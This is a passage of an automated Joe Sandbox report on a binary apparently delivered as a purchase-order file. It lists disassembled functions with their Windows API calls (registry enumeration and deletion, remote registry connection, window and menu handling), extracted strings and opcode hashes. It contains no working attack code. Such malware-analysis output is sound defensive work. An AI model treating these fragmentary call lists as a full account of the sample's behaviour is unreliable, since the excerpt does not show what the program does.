                                        • Part of subcall function 004CD63C: _free.LIBCMT ref: 004CD70D
                                        • Part of subcall function 004CD63C: _free.LIBCMT ref: 004CD71F
                                        • Part of subcall function 004CD63C: _free.LIBCMT ref: 004CD731
                                      • _free.LIBCMT ref: 004CDA96
                                        • Part of subcall function 004C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,004CD7D1,00000000,00000000,00000000,00000000,?,004CD7F8,00000000,00000007,00000000,?,004CDBF5,00000000), ref: 004C29DE
                                        • Part of subcall function 004C29C8: GetLastError.KERNEL32(00000000,?,004CD7D1,00000000,00000000,00000000,00000000,?,004CD7F8,00000000,00000007,00000000,?,004CDBF5,00000000,00000000), ref: 004C29F0
                                      • _free.LIBCMT ref: 004CDAB8
                                      • _free.LIBCMT ref: 004CDACD
                                      • _free.LIBCMT ref: 004CDAD8
                                      • _free.LIBCMT ref: 004CDAFA
                                      • _free.LIBCMT ref: 004CDB0D
                                      • _free.LIBCMT ref: 004CDB1B
                                      • _free.LIBCMT ref: 004CDB26
                                      • _free.LIBCMT ref: 004CDB5E
                                      • _free.LIBCMT ref: 004CDB65
                                      • _free.LIBCMT ref: 004CDB82
                                      • _free.LIBCMT ref: 004CDB9A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                      • String ID:
                                      • API String ID: 161543041-0
                                      • Opcode ID: 48e41096e8fad9502e12f9f59e29fb739ce2622b0939064a4a86139db44c049f
                                      • Instruction ID: 92f02392035430da52bb81d155bbf77dc22c475a35f73c8a6acab713fe20d824
                                      • Opcode Fuzzy Hash: 48e41096e8fad9502e12f9f59e29fb739ce2622b0939064a4a86139db44c049f
                                      • Instruction Fuzzy Hash: 76314CB9A046049FDBA1AA3AD945F57B7E8FF00314F11442FE449D7291DAB9AC40C728
                                      Function 004F365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetClassNameW.USER32(?,?,00000100), ref: 004F369C
                                      • _wcslen.LIBCMT ref: 004F36A7
                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 004F3797
                                      • GetClassNameW.USER32(?,?,00000400), ref: 004F380C
                                      • GetDlgCtrlID.USER32(?), ref: 004F385D
                                      • GetWindowRect.USER32(?,?), ref: 004F3882
                                      • GetParent.USER32(?), ref: 004F38A0
                                      • ScreenToClient.USER32(00000000), ref: 004F38A7
                                      • GetClassNameW.USER32(?,?,00000100), ref: 004F3921
                                      • GetWindowTextW.USER32(?,?,00000400), ref: 004F395D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                      • String ID: %s%u
                                      • API String ID: 4010501982-679674701
                                      • Opcode ID: 3e7b8191b9cd0b7a872b765fef04b226e7f7a77e349acf61bf2768759c6ce00d
                                      • Instruction ID: 11bece4b27139770c2faaa7093594b1f28784283f475b710ccc4b6660e18a5a3
                                      • Opcode Fuzzy Hash: 3e7b8191b9cd0b7a872b765fef04b226e7f7a77e349acf61bf2768759c6ce00d
                                      • Instruction Fuzzy Hash: 5991B37120460AAFD718DF24C885FBBF7E8FF44355F00851AFA99C2250DB78AA49CB95
                                      Function 004F4954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetClassNameW.USER32(?,?,00000400), ref: 004F4994
                                      • GetWindowTextW.USER32(?,?,00000400), ref: 004F49DA
                                      • _wcslen.LIBCMT ref: 004F49EB
                                      • CharUpperBuffW.USER32(?,00000000), ref: 004F49F7
                                      • _wcsstr.LIBVCRUNTIME ref: 004F4A2C
                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 004F4A64
                                      • GetWindowTextW.USER32(?,?,00000400), ref: 004F4A9D
                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 004F4AE6
                                      • GetClassNameW.USER32(?,?,00000400), ref: 004F4B20
                                      • GetWindowRect.USER32(?,?), ref: 004F4B8B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                      • String ID: ThumbnailClass
                                      • API String ID: 1311036022-1241985126
                                      • Opcode ID: a7afe13eda4a4adc83e9b46daf37271ae1a1a4949f0916930e6b5c95c846108e
                                      • Instruction ID: c2c710c4ca66d2a62a0e69d94aeb122f42c315d266522b60653078b3a6dc99fe
                                      • Opcode Fuzzy Hash: a7afe13eda4a4adc83e9b46daf37271ae1a1a4949f0916930e6b5c95c846108e
                                      • Instruction Fuzzy Hash: 6891AD711042099FDB14CF15C981BBB7BA8EF84314F04446AEE859A296DB38ED49CBA9
                                      Function 00528D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 004A9BB2
                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00528D5A
                                      • GetFocus.USER32 ref: 00528D6A
                                      • GetDlgCtrlID.USER32(00000000), ref: 00528D75
                                      • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00528E1D
                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00528ECF
                                      • GetMenuItemCount.USER32(?), ref: 00528EEC
                                      • GetMenuItemID.USER32(?,00000000), ref: 00528EFC
                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00528F2E
                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00528F70
                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00528FA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                      • String ID: 0
                                      • API String ID: 1026556194-4108050209
                                      • Opcode ID: 8d1d99e2973499ecee0ef5a93ae00a0eed51996c4d2ca96ebe3698c7870a2b33
                                      • Instruction ID: 8755ce0836bef653970609b3bdfc0838c3b5ae41dbabcc770bc3e837b445c97c
                                      • Opcode Fuzzy Hash: 8d1d99e2973499ecee0ef5a93ae00a0eed51996c4d2ca96ebe3698c7870a2b33
                                      • Instruction Fuzzy Hash: 4C81CC71509321ABDB20CF64E984ABB7FE9FF9A314F04091DF98497291DB30E905DBA1
                                      Function 004FDC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 004FDC20
                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004FDC46
                                      • _wcslen.LIBCMT ref: 004FDC50
                                      • _wcsstr.LIBVCRUNTIME ref: 004FDCA0
                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 004FDCBC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                      • API String ID: 1939486746-1459072770
                                      • Opcode ID: 1d3fe703d810639c23b01d1ed8395eda347ea1b3ef4bbd57d4518c2ce13085fa
                                      • Instruction ID: 2708fab28200b6da61f06f7b09817ce741ab405283ebd77f6407f6ff4d3288e9
                                      • Opcode Fuzzy Hash: 1d3fe703d810639c23b01d1ed8395eda347ea1b3ef4bbd57d4518c2ce13085fa
                                      • Instruction Fuzzy Hash: A44128329402147AEB14A7759C43EFF7BACEF56714F10016FFA00A6183EB78990596BD
                                      Function 0051CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0051CC64
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0051CC8D
                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0051CD48
                                        • Part of subcall function 0051CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0051CCAA
                                        • Part of subcall function 0051CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0051CCBD
                                        • Part of subcall function 0051CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0051CCCF
                                        • Part of subcall function 0051CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0051CD05
                                        • Part of subcall function 0051CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0051CD28
                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 0051CCF3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                      • API String ID: 2734957052-4033151799
                                      • Opcode ID: 37838c4edf0257ce7f0936ca44c5467b378be9b92940dd80b24b91cc3273049b
                                      • Instruction ID: 4610fac14365ebb3c67313ef99833977d7af7b11070954c507a8260ff8516f93
                                      • Opcode Fuzzy Hash: 37838c4edf0257ce7f0936ca44c5467b378be9b92940dd80b24b91cc3273049b
                                      • Instruction Fuzzy Hash: D5318E71941129BBEB308B50DC88EFFBF7CFF56744F000165A905E6241DA749E8AEAE0
                                      Function 004FE6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • timeGetTime.WINMM ref: 004FE6B4
                                        • Part of subcall function 004AE551: timeGetTime.WINMM(?,?,004FE6D4), ref: 004AE555
                                      • Sleep.KERNEL32(0000000A), ref: 004FE6E1
                                      • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 004FE705
                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 004FE727
                                      • SetActiveWindow.USER32 ref: 004FE746
                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 004FE754
                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 004FE773
                                      • Sleep.KERNEL32(000000FA), ref: 004FE77E
                                      • IsWindow.USER32 ref: 004FE78A
                                      • EndDialog.USER32(00000000), ref: 004FE79B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                      • String ID: BUTTON
                                      • API String ID: 1194449130-3405671355
                                      • Opcode ID: ea8848ce556931a3c5c75d2913bb17b938477890afb6feb9cd28b9d5103f8e7c
                                      • Instruction ID: efe78976d21dc3f91a6b2b98101b2480f557e21ee49ef591e6babd1fccc79723
                                      • Opcode Fuzzy Hash: ea8848ce556931a3c5c75d2913bb17b938477890afb6feb9cd28b9d5103f8e7c
                                      • Instruction Fuzzy Hash: 02219B70200608AFFB105F6BEC8DA3A3F59FB7574AF100426F51282272DBB5AC19B719
                                      Function 004FE9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00499CB3: _wcslen.LIBCMT ref: 00499CBD
                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 004FEA5D
                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 004FEA73
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004FEA84
                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 004FEA96
                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 004FEAA7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: SendString$_wcslen
                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                      • API String ID: 2420728520-1007645807
                                      • Opcode ID: 57097993dd26bb1942cf396d3e335065ca53f7bb3ed9df323432d44e292b6f98
                                      • Instruction ID: 98fadca0ca0dd9c0a1ba5a1a5e9dd94b1c8bd49f9c97aaa743e8ee07529fb453
                                      • Opcode Fuzzy Hash: 57097993dd26bb1942cf396d3e335065ca53f7bb3ed9df323432d44e292b6f98
                                      • Instruction Fuzzy Hash: E0118F61A902597DDB20A7A2DC5ADFF6E7CFBD2F05F40042B7801A20E1EA740909C5B5
                                      Function 004A8BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004A8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,004A8BE8,?,00000000,?,?,?,?,004A8BBA,00000000,?), ref: 004A8FC5
                                      • DestroyWindow.USER32(?), ref: 004A8C81
                                      • KillTimer.USER32(00000000,?,?,?,?,004A8BBA,00000000,?), ref: 004A8D1B
                                      • DestroyAcceleratorTable.USER32(00000000), ref: 004E6973
                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,004A8BBA,00000000,?), ref: 004E69A1
                                      • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,004A8BBA,00000000,?), ref: 004E69B8
                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,004A8BBA,00000000), ref: 004E69D4
                                      • DeleteObject.GDI32(00000000), ref: 004E69E6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                      • String ID:
                                      • API String ID: 641708696-0
                                      • Opcode ID: c419922a8de731ee76cec2938a4915c60e48bb0a3dcdea81ecce90b4669c02c0
                                      • Instruction ID: 23155225d95b58d6109652a722df9acba96ebca74ef9770de1738ec01793199a
                                      • Opcode Fuzzy Hash: c419922a8de731ee76cec2938a4915c60e48bb0a3dcdea81ecce90b4669c02c0
                                      • Instruction Fuzzy Hash: D161CE30402A40DFCB359F19C94872A7BF1FF72366F18452EE04297660CB79A885EF58
                                      Function 004A9838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004A9944: GetWindowLongW.USER32(?,000000EB), ref: 004A9952
                                      • GetSysColor.USER32(0000000F), ref: 004A9862
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ColorLongWindow
                                      • String ID:
                                      • API String ID: 259745315-0
                                      • Opcode ID: 105d587109b0568078a53b5a2046d7de246cd0c58c9d2cd9739f571a88c608d2
                                      • Instruction ID: 6acf86d9f4f029fe0e51dd2453765a5bf48dc3309a098decbc5e62ad9ad90370
                                      • Opcode Fuzzy Hash: 105d587109b0568078a53b5a2046d7de246cd0c58c9d2cd9739f571a88c608d2
                                      • Instruction Fuzzy Hash: 7441D631100640AFDB305F399C84BBA3B65EB27331F14464AF9A2872E2C73C9C46EB15
                                      Function 004F96E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,004DF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 004F9717
                                      • LoadStringW.USER32(00000000,?,004DF7F8,00000001), ref: 004F9720
                                        • Part of subcall function 00499CB3: _wcslen.LIBCMT ref: 00499CBD
                                      • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,004DF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 004F9742
                                      • LoadStringW.USER32(00000000,?,004DF7F8,00000001), ref: 004F9745
                                      • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 004F9866
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: HandleLoadModuleString$Message_wcslen
                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                      • API String ID: 747408836-2268648507
                                      • Opcode ID: 9af70dc6b7692ff48b530b8273594e3c258eb20642be6e5cbd47f06df0a0db59
                                      • Instruction ID: 2e96661ae946741e3a3ca808db23f52b03b2c453d9c19848db8a712554329888
                                      • Opcode Fuzzy Hash: 9af70dc6b7692ff48b530b8273594e3c258eb20642be6e5cbd47f06df0a0db59
                                      • Instruction Fuzzy Hash: AC414072800109AACF14FBD5CD46EFE7B78AF15745F50002EB60572092EB796F48CA65
                                      Function 004F06DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00496B57: _wcslen.LIBCMT ref: 00496B6A
                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004F07A2
                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004F07BE
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 004F07DA
                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 004F0804
                                      • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 004F082C
                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004F0837
                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004F083C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
